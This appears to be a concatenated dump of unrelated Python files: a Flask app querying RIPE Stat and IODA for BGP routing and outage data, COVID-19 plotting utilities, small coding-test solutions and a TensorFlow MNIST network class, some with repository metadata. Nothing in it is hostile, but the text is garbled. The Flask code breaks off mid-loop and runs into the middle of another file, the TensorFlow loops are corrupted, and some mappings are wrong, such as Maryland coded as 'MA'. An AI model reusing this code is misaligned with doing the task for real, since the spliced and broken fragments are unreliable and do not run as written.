#\n# # timestamp = datetime.datetime.fromtimestamp(int(start_time))\n# # start = timestamp.strftime('%Y-%m-%d %H:%M:%S')\n# #\n# # timestamp1 = datetime.datetime.fromtimestamp(int(end_time))\n# # end = timestamp1.strftime('%Y-%m-%d %H:%M:%S')\n# #\n# # print(\"Events occured:\")\n# # list_events = events[\"data\"][\"events\"]\n# print(list_events)\n# # dict[\"Events\"] = list_events\n# #\n# print(\"Country:\")\n# # place = events[\"queryParameters\"][\"meta\"]\n# print(place)\n# # dict[\"Country\"] = place\n# #\n# # print(\"Start time:\")\n# print(start)\n# # dict[\"Start-time\"] = start\n# # print(\"End time:\")\n# print(end)\n# # dict[\"End-time\"] = end\n# #\n# with open(\"events.json\", \"w\") as outfile:\n# # json.dump(dict, outfile)\n# #\n# #\n# def alert():\n# # dict = {}\n# #\n# # curr_date = datetime.datetime.now()\n# print(curr_date)\n# # timestamp = str(int(round(curr_date.timestamp())))\n# print(timestamp)\n# #\n# url = 'https://ioda.caida.org/ioda/data/alerts?from='+timestamp + \\\n# '&until='+timestamp+'&annotateMeta=true&human=true&meta=country/LB'\n# # alerts = requests.get(url).json()\n# #\n# # start_time = alerts[\"queryParameters\"][\"from\"]\n# # end_time = alerts[\"queryParameters\"][\"until\"]\n# #\n# # timestamp1 = datetime.datetime.fromtimestamp(int(start_time))\n# # start = timestamp1.strftime('%Y-%m-%d %H:%M:%S')\n# #\n# # timestamp2 = datetime.datetime.fromtimestamp(int(end_time))\n# # end = timestamp2.strftime('%Y-%m-%d %H:%M:%S')\n# #\n# print(\"Alerts:\")\n# # list_alerts = alerts[\"data\"][\"alerts\"]\n# print(list_alerts)\n# # dict[\"Alerts\"] = list_alerts\n# #\n# # print(\"Start time:\")\n# print(start)\n# # dict[\"Start-time\"] = start\n# # print(\"End time:\")\n# print(end)\n# # dict[\"End-time\"] = end\n# #\n# with open(\"alerts.json\", \"w\") as outfile:\n# # json.dump(dict, outfile)\n# #\n# #\n# event()\n# alert()\n@ app.route(\"/history\")\ndef History():\n adrr = get_tasks()\n adr = adrr['ip']\n # adr='94.187.8.0'\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n\n history = {}\n\n sous_dict = {}\n\n url = \"https://stat.ripe.net/data/routing-history/data.json?min_peers=0&resource=\"+asn\n\n hist = requests.get(url).json()\n\n liste = []\n\n pref = responseip[\"data\"][\"records\"][0][0][\"value\"]\n pref = pref[0:(len(pref)-3)]\n\n for p in hist[\"data\"][\"by_origin\"][0][\"prefixes\"]:\n\n liste.append(p[\"prefix\"])\n\n j = 0\n while(j < len(liste)):\n liste[j] = liste[j][0:(len(liste[j])-3)]\n j = j+1\n\n for l in liste:\n\n if (pref == l):\n\n # date = \"2022\"\n\n i = 0\n\n for d in p[\"timelines\"]:\n\n # print(d)\n\n # print(d[\"starttime\"])\n\n if \"2022\" in d[\"starttime\"]:\n\n sous_dict[d[\"starttime\"][0:10]] = d[\"full_peers_seeing\"]\n sous_dict[d[\"endtime\"][0:10]] = d[\"full_peers_seeing\"]\n i = i+1\n\n return sous_dict\n\n\n@ app.route(\"/all\")\ndef All():\n\n adrr = get_tasks()\n adr = adrr['ip']\n # adr='91.232.100.0'\n dictionnaire = {}\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n sous_dict = {}\n\n list_prefixe = \"https://stat.ripe.net/data/announced-prefixes/data.json?resource=\"+asn\n lists = requests.get(list_prefixe).json()\n j = 0\n for i in lists[\"data\"][\"prefixes\"]:\n prefix = i[\"prefix\"]\n dictionnaire[j] = prefix\n j = j+1\n sous_dict = {}\n\n k = 0\n\n while (k < len(dictionnaire)):\n\n url = \"https://stat.ripe.net/data/routing-history/data.json?min_peers=0&resource=\" + \\\n str(dictionnaire[k][0:(len(dictionnaire[k])-3)])\n\n hist = requests.get(url).json()\n\n for p in hist[\"data\"][\"by_origin\"]:\n if (p[\"origin\"] == asn):\n\n for d in p[\"prefixes\"][0][\"timelines\"]:\n # print(d)\n\n # print(d[\"starttime\"])\n\n if \"2022\" in d[\"starttime\"]:\n if (d[\"starttime\"][0:10] in sous_dict.keys()):\n sous_dict[d[\"starttime\"][0:10]] = sous_dict[d[\"starttime\"]\n [0:10]]+d[\"full_peers_seeing\"]\n if (d[\"endtime\"][0:10] in sous_dict.keys()):\n sous_dict[d[\"endtime\"][0:10]] = sous_dict[d[\"endtime\"]\n [0:10]] + d[\"full_peers_seeing\"]\n else:\n sous_dict[d[\"starttime\"][0:10]\n ] = d[\"full_peers_seeing\"]\n sous_dict[d[\"endtime\"][0:10]\n ] = d[\"full_peers_seeing\"]\n\n k = k+1\n for i in sous_dict.keys():\n sous_dict[i] = sous_dict[i]/len(dictionnaire)\n\n return sous_dict\n\n\n@ app.route(\"/pred\")\ndef Pred():\n adrr = get_tasks()\n adr = adrr['ip']\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n url = 'https://stat.ripe.net/data/bgp-update-activity/data.json?endtime=2022-04-11T12%3A00%3A00&hide_empty_samples=false&max_samples=5000&resource=AS' + \\\n str(asn)+'&starttime=2021-04-11T00%3A00%3A00'\n r = requests.get(url)\n json = r.json()\n return json\n\n\n@ app.route(\"/pay\")\ndef pays():\n country_names = {\n \"afghanistan\": \"AF\",\n \"land Islands\": \"AX\",\n \"albania\": \"AL\",\n \"algeria\": \"DZ\",\n \"american Samoa\": \"AS\",\n \"andorrA\": \"AD\",\n \"angola\": \"AO\",\n \"anguilla\": \"AI\",\n \"antarctica\": \"AQ\",\n \"antigua and Barbuda\": \"AG\",\n \"argentina\": \"AR\",\n \"armenia\": \"AM\",\n \"aruba\": \"AW\",\n \"australia\": \"AU\",\n \"austria\": \"AT\",\n \"azerbaijan\": \"AZ\",\n \"bahamas\": \"BS\",\n \"bahrain\": \"BH\",\n \"bangladesh\": \"BD\",\n \"barbados\": \"BB\",\n \"belarus\": \"BY\",\n \"belgium\": \"BE\",\n \"belize\": \"BZ\",\n \"benin\": \"BJ\",\n \"bermuda\": \"BM\",\n \"bhutan\": \"BT\",\n \"bolivia\": \"BO\",\n \"bosnia and herzegovina\": \"BA\",\n \"botswana\": \"BW\",\n \"bouvet island\": \"BV\",\n \"brazil\": \"BR\",\n \"british indian ocean territory\": \"IO\",\n \"brunei darussalam\": \"BN\",\n \"bulgaria\": \"BG\",\n \"burkina faso\": \"BF\",\n \"burundi\": \"BI\",\n \"cambodia\": \"KH\",\n \"cameroon\": \"CM\",\n \"canada\": \"CA\",\n \"cape verde\": \"CV\",\n \"cayman islands\": \"KY\",\n \"central african republic\": \"CF\",\n \"chad\": \"TD\",\n \"chile\": \"CL\",\n \"china\": \"CN\",\n \"christmas island\": \"CX\",\n \"cocos (Keeling) islands\": \"CC\",\n \"colombia\": \"CO\",\n \"comoros\": \"KM\",\n \"congo\": \"CG\",\n \"congo, The Democratic Republic of the\": \"CD\",\n \"cook islands\": \"CK\",\n \"costa rica\": \"CR\",\n \"cote d\\\"ivoire\": \"CI\",\n \"croatia\": \"HR\",\n \"cuba\": \"CU\",\n \"cyprus\": \"CY\",\n \"czech republic\": \"CZ\",\n \"denmark\": \"DK\",\n \"djibouti\": \"DJ\",\n \"dominica\": \"DM\",\n \"dominican republic\": \"DO\",\n \"ecuador\": \"EC\",\n \"egypt\": \"EG\",\n \"el salvador\": \"SV\",\n \"equatorial guinea\": \"GQ\",\n \"eritrea\": \"ER\",\n \"estonia\": \"EE\",\n \"ethiopia\": \"ET\",\n \"falkland islands (malvinas)\": \"FK\",\n \"faroe islands\": \"FO\",\n \"fiji\": \"FJ\",\n \"finland\": \"FI\",\n \"france\": \"FR\",\n \"french guiana\": \"GF\",\n \"french polynesia\": \"PF\",\n \"french southern territories\": \"TF\",\n \"gabon\": \"GA\",\n \"gambia\": \"GM\",\n \"georgia\": \"GE\",\n \"germany\": \"DE\",\n \"ghana\": \"GH\",\n \"gibraltar\": \"GI\",\n \"greece\": \"GR\",\n \"greenland\": \"GL\",\n \"grenada\": \"GD\",\n \"guadeloupe\": \"GP\",\n \"guam\": \"GU\",\n \"guatemala\": \"GT\",\n \"guernsey\": \"GG\",\n \"guinea\": \"GN\",\n \"guinea-bissau\": \"GW\",\n \"guyana\": \"GY\",\n \"haiti\": \"HT\",\n \"heard island and mcdonald islands\": \"HM\",\n \"holy see (vatican city state)\": \"VA\",\n \"honduras\": \"HN\",\n \"hong kong\": \"HK\",\n \"hungary\": \"HU\",\n \"iceland\": \"IS\",\n \"india\": \"IN\",\n \"indonesia\": \"ID\",\n \"iran, islamic republic of\": \"IR\",\n \"iraq\": \"IQ\",\n \"ireland\": \"IE\",\n \"isle of man\": \"IM\",\n \"israel\": \"IL\",\n \"italy\": \"IT\",\n \"jamaica\": \"JM\",\n \"japan\": \"JP\",\n \"jersey\": \"JE\",\n \"jordan\": \"JO\",\n \"kazakhstan\": \"KZ\",\n \"kenya\": \"KE\",\n \"kiribati\": \"KI\",\n \"korea, democratic people\\\"s republic of\": \"KP\",\n \"korea, republic of\": \"KR\",\n \"kuwait\": \"KW\",\n \"kyrgyzstan\": \"KG\",\n \"lao people\\\"s democratic republic\": \"LA\",\n \"latvia\": \"LV\",\n \"lebanon\": \"LB\",\n \"lesotho\": \"LS\",\n \"liberia\": \"LR\",\n \"libyan Arab Jamahiriya\": \"LY\",\n \"liechtenstein\": \"LI\",\n \"lithuania\": \"LT\",\n \"luxembourg\": \"LU\",\n \"macao\": \"MO\",\n \"macedonia, the former yugoslav republic of\": \"MK\",\n \"madagascar\": \"MG\",\n \"malawi\": \"MW\",\n \"malaysia\": \"MY\",\n \"maldives\": \"MV\",\n \"mali\": \"ML\",\n \"malta\": \"MT\",\n \"marshall islands\": \"MH\",\n \"martinique\": \"MQ\",\n \"mauritania\": \"MR\",\n \"mauritius\": \"MU\",\n \"mayotte\": \"YT\",\n \"mexico\": \"MX\",\n \"micronesia, federated states of\": \"FM\",\n \"moldova, republic of\": \"MD\",\n \"monaco\": \"MC\",\n \"mongolia\": \"MN\",\n \"montenegro\": \"ME\",\n \"montserrat\": \"MS\",\n \"morocco\": \"MA\",\n \"mozambique\": \"MZ\",\n \"myanmar\": \"MM\",\n \"namibia\": \"NA\",\n \"nauru\": \"NR\",\n \"nepal\": \"NP\",\n \"netherlands\": \"NL\",\n \"netherlands antilles\": \"AN\",\n \"new caledonia\": \"NC\",\n \"new zealand\": \"NZ\",\n \"nicaragua\": \"NI\",\n \"niger\": \"NE\",\n \"nigeria\": \"NG\",\n \"niue\": \"NU\",\n \"norfolk island\": \"NF\",\n \"northern mariana islands\": \"MP\",\n \"norway\": \"NO\",\n \"oman\": \"OM\",\n \"pakistan\": \"PK\",\n \"palau\": \"PW\",\n \"palestinian territory, occupied\": \"PS\",\n \"panama\": \"PA\",\n \"papua new guinea\": \"PG\",\n \"paraguay\": \"PY\",\n \"peru\": \"PE\",\n \"philippines\": \"PH\",\n \"pitcairn\": \"PN\",\n \"poland\": \"PL\",\n \"portugal\": \"PT\",\n \"puerto rico\": \"PR\",\n \"qatar\": \"QA\",\n \"reunion\": \"RE\",\n \"romania\": \"RO\",\n \"russian federation\": \"RU\",\n \"rwanda\": \"RW\",\n \"saint helena\": \"SH\",\n \"saint kitts and nevis\": \"KN\",\n \"saint lucia\": \"LC\",\n \"saint pierre and miquelon\": \"PM\",\n \"saint vincent and the grenadines\": \"VC\",\n \"samoa\": \"WS\",\n \"san marino\": \"SM\",\n \"sao tome and principe\": \"ST\",\n \"saudi arabia\": \"SA\",\n \"senegal\": \"SN\",\n \"serbia\": \"RS\",\n \"seychelles\": \"SC\",\n \"sierra leone\": \"SL\",\n \"singapore\": \"SG\",\n \"slovakia\": \"SK\",\n \"slovenia\": \"SI\",\n \"solomon islands\": \"SB\",\n \"somalia\": \"SO\",\n \"south africa\": \"ZA\",\n \"south georgia and the south sandwich islands\": \"GS\",\n \"spain\": \"ES\",\n \"sri lanka\": \"LK\",\n \"sudan\": \"SD\",\n \"s\": \"SR\",\n \"svalbard and jan mayen\": \"SJ\",\n \"swaziland\": \"SZ\",\n \"sweden\": \"SE\",\n \"switzerland\": \"CH\",\n \"syrian arab republic\": \"SY\",\n \"taiwan, province of china\": \"TW\",\n \"tajikistan\": \"TJ\",\n \"tanzania, united republic of\": \"TZ\",\n \"thailand\": \"TH\",\n \"timor-leste\": \"TL\",\n \"togo\": \"TG\",\n \"tokelau\": \"TK\",\n \"tonga\": \"TO\",\n \"trinidad and tobago\": \"TT\",\n \"tunisia\": \"TN\",\n \"turkey\": \"TR\",\n \"turkmenistan\": \"TM\",\n \"turks and caicos islands\": \"TC\",\n \"tuvalu\": \"TV\",\n \"uganda\": \"UG\",\n \"ukraine\": \"UA\",\n \"united arab emirates\": \"AE\",\n \"united kingdom\": \"GB\",\n \"united states\": \"US\",\n \"united states minor outlying islands\": \"UM\",\n \"uruguay\": \"UY\",\n \"uzbekistan\": \"UZ\",\n \"vanuatu\": \"VU\",\n \"venezuela\": \"VE\",\n \"viet nam\": \"VN\",\n \"virgin islands, british\": \"VG\",\n \"virgin islands, U.S.\": \"VI\",\n \"wallis and futuna\": \"WF\",\n \"western sahara\": \"EH\",\n \"yemen\": \"YE\",\n \"zambia\": \"ZM\",\n \"zimbabwe\": \"ZW\"\n }\n return country_names\n\n# @app.route(\"/alert\")\n# def alert():\n# dict = {}\n\n# curr_date = datetime.datetime.now()\n\n# timestamp = str(int(round(curr_date.timestamp())))\n\n\n# url = 'https://ioda.caida.org/ioda/data/alerts?from='+timestamp + \\\n# '&until='+timestamp+'&annotateMeta=true&human=true&meta=asn/3307'\n# alerts = requests.get(url).json()\n\n# start_time = alerts[\"queryParameters\"][\"from\"]\n# end_time = alerts[\"queryParameters\"][\"until\"]\n\n# timestamp1 = datetime.datetime.fromtimestamp(int(start_time))\n# start = timestamp1.strftime('%Y-%m-%d %H:%M:%S')\n\n# timestamp2 = datetime.datetime.fromtimestamp(int(end_time))\n# end = timestamp2.strftime('%Y-%m-%d %H:%M:%S')\n\n\n# list_alerts = alerts[\"data\"][\"alerts\"]\n\n# dict[\"Alerts\"] = list_alerts\n\n\n# dict[\"Start-time\"] = start\n\n\n# dict[\"End-time\"] = end\n\n# s=\"\"\n\n# if not list_alerts:\n# s=\"No Outages are expected\"\n# return s\n# else:\n# return list_alerts\n\n@ app.route(\"/message\")\ndef message():\n adrr = get_tasks()\n adr = adrr['ip']\n\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b = responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a) == False):\n asn = a\n if (any(c.isalpha() for c in b) == False):\n asn = b\n dict = {}\n mssg = {}\n previous_date = datetime.datetime.today() - datetime.timedelta(days=1)\n times = str(int(round(previous_date.timestamp())))\n\n curr_date = datetime.datetime.now()\n times1 = str(int(round(curr_date.timestamp())))\n\n url = 'https://ioda.caida.org/ioda/data/events?from=' + \\\n times+'&until='+times1+'&human=true&meta=asn/'+asn\n events = requests.get(url).json()\n\n start_time = events[\"queryParameters\"][\"from\"]\n end_time = events[\"queryParameters\"][\"until\"]\n\n timestamp1 = datetime.datetime.fromtimestamp(int(start_time))\n start = timestamp1.strftime('%Y-%m-%d %H:%M:%S')\n\n timestamp2 = datetime.datetime.fromtimestamp(int(end_time))\n end = timestamp2.strftime('%Y-%m-%d %H:%M:%S')\n\n list_events = events[\"data\"][\"events\"]\n\n dict[\"events\"] = list_events\n\n dict[\"Start-time\"] = start\n\n dict[\"End-time\"] = end\n\n s = \"\"\n\n if not list_events:\n s = \"No outages occured while you were away\"\n mssg[\"outages\"] = s\n\n else:\n s = \"An Outage Occured\"\n mssg[\"outages\"] = s\n\n return mssg\n\n@app.route(\"/ml\")\ndef ML():\n adrr = get_tasks()\n adr=adrr['ip']\n #adr='94.187.8.0'\n sourceip = \"https://stat.ripe.net/data/whois/data.json?resource=\"+adr+\"%2F24\"\n responseip = requests.get(sourceip).json()\n a = responseip[\"data\"][\"irr_records\"][0][2][\"value\"]\n b=responseip[\"data\"][\"irr_records\"][0][1][\"value\"]\n if (any(c.isalpha() for c in a)==False):\n asn=a\n if (any(c.isalpha() for c in b)==False):\n asn=b\n url = \"https://stat.ripe.net/data/routing-history/data.json?min_peers=0&resource=\"+asn\n\n pref = responseip[\"data\"][\"records\"][0][0][\"value\"]\n pref=pref[0:(len(pref)-3)]\n url = 'https://stat.ripe.net/data/bgp-update-activity/data.json?endtime=2022-04-15T12%3A00%3A00&hide_empty_samples=false&max_samples=10000&resource='+pref+'&starttime=2021-04-29T00%3A00%3A00'\n r = requests.get(url)\n json = r.json()\n df = pd.DataFrame(json['data']['updates'])\n df.drop(\"starttime\", axis=1, inplace=True)\n r=df.shape[0]-1\n nb=df.iloc[r,0:2].values\n df = df.drop(df.shape[0]-1, axis=0)\n l=[]\n av=df[\"announcements\"].mean()\n l.append(int(df[\"announcements\"][0]>av))\n l.append(int(df[\"announcements\"][1]>av))\n i=2\n while (i one dataframe\n frame = pd.concat(ts, axis=1)\n\n frame['as_of_date'] = dfs[category].index.max()\n\n # exclude the two cruise ships\n mask = frame.index.isin({'Diamond Princess', 'Grand Princess'})\n frame = frame[~ mask]\n\n return frame\n\n\n\nstate_name_to_code = {\n 'California': 'CA',\n 'Connecticut': 'CT',\n 'Florida': 'FL',\n 'Illinois': 'IL',\n 'Louisiana': 'LA',\n 'Maryland': 'MA',\n 'Massachusetts': 'MA',\n 'Michigan': 'MI',\n 'New Jersey': 'NJ',\n 'New York': 'NY',\n 'Pennsylvania': 'PA',\n 'Texas': 'TX',\n}\n\n\n\ndef plot_count_vs_rate(data, category):\n fig, ax = plt.subplots(figsize=(10, 6))\n\n as_of = data['as_of_date'].iloc[0].strftime('%Y-%m-%d')\n x = category\n y = f'{category} per 100k'\n \n ax.scatter(data[x].values, data[y].values, alpha=0.5)\n\n ax.set(xlabel = x.title(),\n ylabel = y.title(),\n title = f'Number of {x.title()} vs. Number of {y.title()} as of {as_of}',\n )\n \n # add annotation for top 10 items\n for state in data[x].sort_values(ascending=False).index[0:10]:\n state_x = data.at[state, x]\n state_y = data.at[state, y]\n\n ax.annotate(state_name_to_code.get(state, state),\n xy=(state_x, state_y),\n xycoords='data',\n xytext=(5, 0),\n textcoords='offset points',\n #arrowprops=dict(facecolor='black', shrink=0.05),\n horizontalalignment='left',\n verticalalignment='center')\n\n return fig, ax\n\n\ndef plot_confirmed_vs_deaths(data):\n\n fig, ax = plt.subplots(figsize=(10, 6))\n \n as_of = data['as_of_date'].iloc[0].strftime('%Y-%m-%d')\n\n mask = data['deaths'] >= 10\n\n ax.scatter(data.loc[mask, 'confirmed'].values,\n data.loc[mask, 'deaths'].values,\n alpha=0.5)\n\n ax.set(xlabel='Number of Confirmed Cases',\n ylabel='Number of Deaths',\n xscale='log',\n yscale='log',\n title=f'Number of Confirmed Cases vs Number of Deaths as of {as_of}',\n )\n\n ax.annotate('for states reporting\\n10 or more deaths',\n xy=(1, 0),\n xycoords='axes fraction',\n xytext=(-20, 20),\n textcoords='offset pixels',\n horizontalalignment='right',\n verticalalignment='bottom',\n )\n \n # add annotation for top 10 items\n x = 'confirmed'\n y = 'deaths'\n \n for state in data[y].sort_values(ascending=False).index[0:10]:\n state_x = data.at[state, x]\n state_y = data.at[state, y]\n\n ax.annotate(state_name_to_code.get(state, state),\n xy=(state_x, state_y),\n xycoords='data',\n xytext=(5, 0),\n textcoords='offset points',\n #arrowprops=dict(facecolor='black', shrink=0.05),\n horizontalalignment='left',\n verticalalignment='center')\n\n \n return fig, ax\n\n\ndef plot_observations_vs_date(data, category):\n\n fig, ax = plt.subplots(figsize=(10, 6))\n\n top_10_states = (data[category]\n .sum(axis=1, level='Province_State')\n .iloc[-1]\n .sort_values(ascending=False)\n .index[0:10]\n )\n\n for state in top_10_states:\n t = data[category].sum(axis=1, level='Province_State').loc[:, state].loc[lambda x: x >= 10]\n ax.plot(t, label=state)\n\n ax.set(xlabel='Date',\n ylabel=f'Number of {category.title()}',\n yscale='log',\n title=f'Number of {category.title()}'\n )\n ax.get_xaxis().set_major_locator(mdates.DayLocator(interval=14))\n ax.get_xaxis().set_major_formatter(mdates.DateFormatter('%b %d'))\n\n ax.legend()\n\n return fig, ax\n\ndef plot_observations_vs_days(data, category):\n\n fig, ax = plt.subplots(figsize=(10, 6))\n\n top_10_states = (data[category]\n .sum(axis=1, level='Province_State')\n .iloc[-1]\n .sort_values(ascending=False)\n .index[0:10]\n )\n\n for state in top_10_states:\n t = (data[category]\n .sum(axis=1, level='Province_State')\n .loc[:, state]\n .loc[lambda x: x >= 10]\n .reset_index(drop=True)\n )\n ax.plot(t, label=state)\n\n ax.set(xlabel=f'Days since 10th {category.title()}',\n ylabel=f'Number of {category.title()}',\n yscale='log',\n title=f'Number of {category.title()}'\n )\n\n ax.legend()\n\n return fig, ax\n\n# counties in Southern California (So Cal)\nso_cal_counties = [\n 'Imperial',\n 'Kern',\n 'Los Angeles',\n 'Orange',\n 'Riverside',\n 'San Bernardino',\n 'San Diego',\n 'San Luis Obispo',\n 'Santa Barbara',\n 'Ventura',\n ]\n\ndef drop_level_inline(df):\n t = df.copy()\n t.columns = t.columns.droplevel(0)\n return t\n\ndef confirmed_cases_so_cal(data, category):\n fig, ax = plt.subplots(figsize=(10, 6))\n\n t = (data[category]\n .loc[:, ('California', so_cal_counties)]\n .pipe(drop_level_inline)\n )\n\n for county in t.columns:\n ax.plot(t[county].loc[lambda x: x >= 10], label=county)\n\n ax.set(xlabel='date',\n ylabel='# of Confirmed Cases',\n yscale='log',\n title='Confirmed Cases in Southern California',\n )\n\n ax.get_xaxis().set_major_locator(mdates.DayLocator(interval=14))\n ax.get_xaxis().set_major_formatter(mdates.DateFormatter('%b %d'))\n\n ax.legend()\n \n return fig, ax\n","repo_name":"jeffrey-smart/covid-19","sub_path":"src/covid_util.py","file_name":"covid_util.py","file_ext":"py","file_size_in_byte":10117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"28666138428","text":"a,b,c = map(int, input().split())\n\nif b >= c:\n print(-1)\n exit()\n\nn = (a // (c -b)) + 1\nprint(n) \n\n\n# 손익분기점\n# 고정비용 A만원\n# 노트북 1대 생산 가변비용 B만원\n# 노트북 가격 C만원\n\n# 총 비용 = A + (B * n)\n# 이익 = C * n\n\n# https://www.acmicpc.net/problem/1712","repo_name":"Gajeju/Coding_test_Programming","sub_path":"bkackjoon/step/08_math_1/P01_1712.py","file_name":"P01_1712.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"30691845521","text":"import sys\ninput = sys.stdin.readline\nfrom collections import deque\n\nt = int(input())\nfor c in range(t) : \n start, end = map(int, input().split())\n isVisit = [False] * 10000\n isVisit[start] = True\n path = [\"\"] * 10000\n q = deque()\n q.append(start)\n\n while q : \n tmp = q.popleft()\n\n # D *2\n op = (tmp*2) % 10000\n if not isVisit[op] :\n q.append(op)\n path[op] = path[tmp] + 'D'\n isVisit[op] = True\n\n # S -1\n op = (tmp-1) % 10000\n if not isVisit[op] :\n q.append(op)\n path[op] += path[tmp] + 'S'\n isVisit[op] = True\n\n # L <1\n op = (tmp % 1000) * 10 + tmp // 1000\n\n if not isVisit[op] :\n q.append(op)\n path[op] += path[tmp] + 'L'\n isVisit[op] = True\n \n # R >1\n op = (tmp % 10) * 1000 + tmp // 10\n\n if not isVisit[op] :\n q.append(op)\n path[op] += path[tmp] + 'R'\n isVisit[op] = True\n\n print(path[end])","repo_name":"SuperH0ng/algorithm","sub_path":"따로 푼 것/백준/백준 9019번(DSLR).py","file_name":"백준 9019번(DSLR).py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13401717381","text":"import matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix\nimport time\nfrom datetime import timedelta\nimport math\nimport scipy.ndimage\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nclass network(object):\n def __init__(self):\n tf.reset_default_graph()\n self.test_batch_size = 256\n self.train_batch_size = 64\n self.total_iterations = 0\n\n def setup(self,load = None, structure=None,end_relu = False,end_biases = False, data = None, offset = 0, scale = 1):\n \"\"\"\n Creates a network\n load: the filepath of the network to load (must be compatible with \"structure\"), if none then a new network will be created\n structure: an array determining the type of network and the hidden structure of the network. The array has the shape:\n [size of filters/number of nodes, number of filters/MLP, use pooling/use_relu, use biases];\n If the second input is <=0 then the network will be a MPL, else it will be a ConvNet.\n the last two inputs get converted to boolean from 1 or 0; they determine if the layer has biases and pooling/ReLUs on the layer. (convnets always use ReLUs). There is a fully connected layer added by default at the end of the network, this should not be in the structure array.\n end_relu: determines if the final layer has a ReLU;\n end_biases: determines if the final layer has biases;\n data: none defaults to the MNIST dataset from the Tensorflow examples folder, but others can be used (supplying the MNIST dataset is quicker if it is already loaded);\n offset: puts an offset on all images coming into the network e.g -0.5 will make all MNIST images between -0.5 and 0.5 instead of 0 to 1\n scale: scales the input image by any value, applies before offset\n \n \"\"\"\n self.scale = scale\n self.offset = offset\n self.structure = structure\n self.data = data\n if (self.data is None):\n self.data = input_data.read_data_sets('data/MNIST/', one_hot=True)\n\n # We know that MNIST images are 28 pixels in each dimension.\n self.img_size = 28\n # Images are stored in one-dimensional arrays of this length.\n self.img_size_flat = self.img_size * self.img_size\n # Tuple with height and width of images used to reshape arrays.\n self.img_shape = (self.img_size, self.img_size)\n # Number of colour channels for the images: 1 channel for gray-scale.\n self.num_channels = 1\n # Number of classes, one class for each of 10 digits.\n self.num_classes = 10\n\n self.x = tf.placeholder(tf.float32, shape=[None, self.img_size_flat], name='x')\n self.scale_layer = tf.multiply(self.x,self.scale)\n self.offset_layer = tf.add(self.scale_layer,self.offset)\n self.x_image = tf.reshape(self.offset_layer, [-1, self.img_size, self.img_size, self.num_channels])\n self.y_true = tf.placeholder(tf.float32, shape=[None, self.num_classes], name='y_true')\n self.y_true_cls = tf.argmax(self.y_true, axis=1)\n\n self.layers = [tf.Tensor for i in range(self.structure.shape[0]+1)]\n self.weights = [tf.Variable for i in range(self.structure.shape[0]+1)]\n self.biases = [tf.Variable for i in range(self.structure.shape[0]+1)]\n\n i=0;\n while (i0):\n if (i==0):\n self.layers[i],self.weights[i],self.biases[i] =\\\n self.new_conv_layer(input=self.x_image,\n num_input_channels=self.num_channels,\n filter_size=self.filter_size,\n num_filters=self.num_filters,\n use_pooling=self.use_pooling,\n use_biases =self.use_biases)\n else:\n self.num_input_channels = self.structure[i-1,1]\n self.layers[i],self.weights[i],self.biases[i] =\\\n self.new_conv_layer(input=self.layers[i-1],\n num_input_channels=self.num_input_channels,\n filter_size=self.filter_size,\n num_filters=self.num_filters,\n use_pooling=self.use_pooling,\n use_biases =self.use_biases)\n i=i+1\n\n else:\n if (i==0):\n self.layer_flat, self.num_features = self.flatten_layer(self.x_image)\n self.layers[i],self.weights[i],self.biases[i] = self.new_fc_layer(input=self.layer_flat,\n num_inputs=self.num_features,\n num_outputs=self.filter_size,\n use_relu=self.use_pooling,\n use_biases =self.use_biases)\n else:\n if(self.structure[i-1,1]>0):\n self.image_flat, self.num_pixels = self.flatten_layer(self.layers[i-1])\n self.layers[i],self.weights[i],self.biases[i] = self.new_fc_layer(input=self.image_flat,\n num_inputs=self.num_pixels,\n num_outputs=self.filter_size,\n use_relu=self.use_pooling,\n use_biases =self.use_biases)\n\n else:\n self.layers[i],self.weights[i],self.biases[i] = self.new_fc_layer(input=self.layers[i-1],\n num_inputs=self.num_features,\n num_outputs=self.filter_size,\n use_relu=self.use_pooling,\n use_biases =self.use_biases)\n self.num_features = self.filter_size\n i=i+1\n\n if(self.structure[i-1,1]>0):\n self.layer_last,self.num_features = self.flatten_layer(self.layers[i-1])\n else:\n self.layer_last = self.layers[i-1]\n\n self.layers[i],self.weights[i],self.biases[i]= self.new_fc_layer(input=self.layer_last,\n num_inputs=self.num_features,\n num_outputs=self.num_classes,\n use_relu=end_relu,\n use_biases = end_biases)\n\n self.y_pred = tf.nn.softmax(self.layers[i])\n\n self.y_pred_cls = tf.argmax(self.y_pred, axis=1)\n\n self.cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=self.layers[i],\n labels=self.y_true)\n self.cost = tf.reduce_mean(self.cross_entropy)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(self.cost)\n self.correct_prediction = tf.equal(self.y_pred_cls, self.y_true_cls)\n self.accuracy = tf.reduce_mean(tf.cast(self.correct_prediction, tf.float32))\n\n self.session = tf.Session()\n 